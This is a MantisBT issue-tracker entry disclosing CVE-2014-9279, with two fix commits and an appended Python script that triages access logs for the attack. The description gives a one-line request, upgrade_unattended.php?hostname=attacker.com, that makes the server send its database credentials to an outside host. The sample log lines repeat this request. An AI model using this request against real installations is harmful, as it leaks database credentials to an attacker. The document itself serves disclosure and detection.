View Issue Details

ID: 0017877
Project: mantisbt
Category: security
View Status: public
Last Update: 2014-12-05 18:33
Reporter: avlidienbrunn
Assigned To: dregad
Priority: high
Severity: major
Reproducibility: always
Status: closed
Resolution: fixed
Product Version: 1.1.0a3
Target Version: 1.2.18
Fixed in Version: 1.2.18
Summary: 0017877: CVE-2014-9279: Db Credentials leak via unattended upgrade script
Description

When [MantisBT]/admin/upgrade_unattended.php?hostname=attacker.com is accessed, MantisBT will connect to attacker.com with the current DB config credentials.

Additional Information

Originally reported under point 6. in 0017362

Tags: No tags attached.

Relationships

child of 0017362 (closed, dregad): Multiple vulnerabilities in MantisBT

Activities

Related Changesets

MantisBT: master 7c7c2ac7

2014-10-30 14:53

Paul Richards

Committer: dregad


DB Credentials leak in upgrade_unattended.php

Retrieve credentials from Mantis system configuration instead of
accepting them from POST parameters.

This issue was reported by Matthias Karlsson (http://mathiaskarlsson.me)
as part of Offensive Security's bug bounty program [1].

Fixes 0017877

[1] http://www.offensive-security.com/bug-bounty-program/

Signed-off-by: Damien Regad <dregad@mantisbt.org>
Affected Issues
0017877
mod - admin/upgrade_unattended.php

MantisBT: master-1.2.x 0826cef8

2014-11-28 06:50

dregad


DB Credentials leak in upgrade_unattended.php

Retrieve credentials from Mantis system configuration instead of
accepting them from POST parameters.

This issue was reported by Matthias Karlsson (http://mathiaskarlsson.me)
as part of Offensive Security's bug bounty program [1].

Paul Richards' original patch was modified to align the code with master
branch (basically replacing DIRECTORY_SEPARATOR by '/') to facilitate
porting.

Fixes 0017877

[1] http://www.offensive-security.com/bug-bounty-program/

Signed-off-by: Damien Regad <dregad@mantisbt.org>
Affected Issues
0017877
mod - admin/upgrade_unattended.php
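Added example (not part of the original issue and not MantisBT code): a triage pass over web access logs for the request described in this issue, reporting calls to admin/upgrade_unattended.php that carry a hostname parameter and the server each one pointed at. The combined log format, the sample lines, the addresses and the function name `triage` are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

SCRIPT = "/admin/upgrade_unattended.php"  # script path named in the issue
LOG_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3})'
)

# Constructed sample lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Nov/2014:10:00:00 +0000] "GET /mantis/admin/upgrade_unattended.php?hostname=db.attacker.example HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Nov/2014:10:00:05 +0000] "GET /mantis/admin/upgrade_unattended.php?hostname=198.51.100.9%3A3306 HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Nov/2014:10:01:00 +0000] "GET /mantis/admin/upgrade_unattended.php HTTP/1.1" 200 498',
    '192.0.2.10 - - [01/Nov/2014:10:02:00 +0000] "GET /mantis/view.php?id=1&hostname=x HTTP/1.1" 200 2048',
    '192.0.2.11 - - [01/Nov/2014:10:03:00 +0000] "POST /mantis/admin/upgrade_unattended.php HTTP/1.1" 200 498',
]


def triage(lines):
    """Classify requests to the upgrade script as (client, kind, host, status).

    'override'  : the query string carries `hostname`; on an affected version
                  its value is the server the DB credentials were sent to.
    'post-body' : POST to the script; its parameters travel in the body,
                  which an access log does not record, so the request needs
                  manual review against other evidence.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # MantisBT can be installed under any prefix: match the path suffix.
        if not unquote(url.path).endswith(SCRIPT):
            continue
        hosts = parse_qs(url.query, keep_blank_values=True).get("hostname", [])
        for host in hosts:
            findings.append((m["client"], "override", host, m["status"]))
        if not hosts and m["method"] == "POST":
            findings.append((m["client"], "post-body", None, m["status"]))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

Any 'override' hit against a version before 1.2.18 is grounds for rotating the database password, since the credentials may already have reached the listed host.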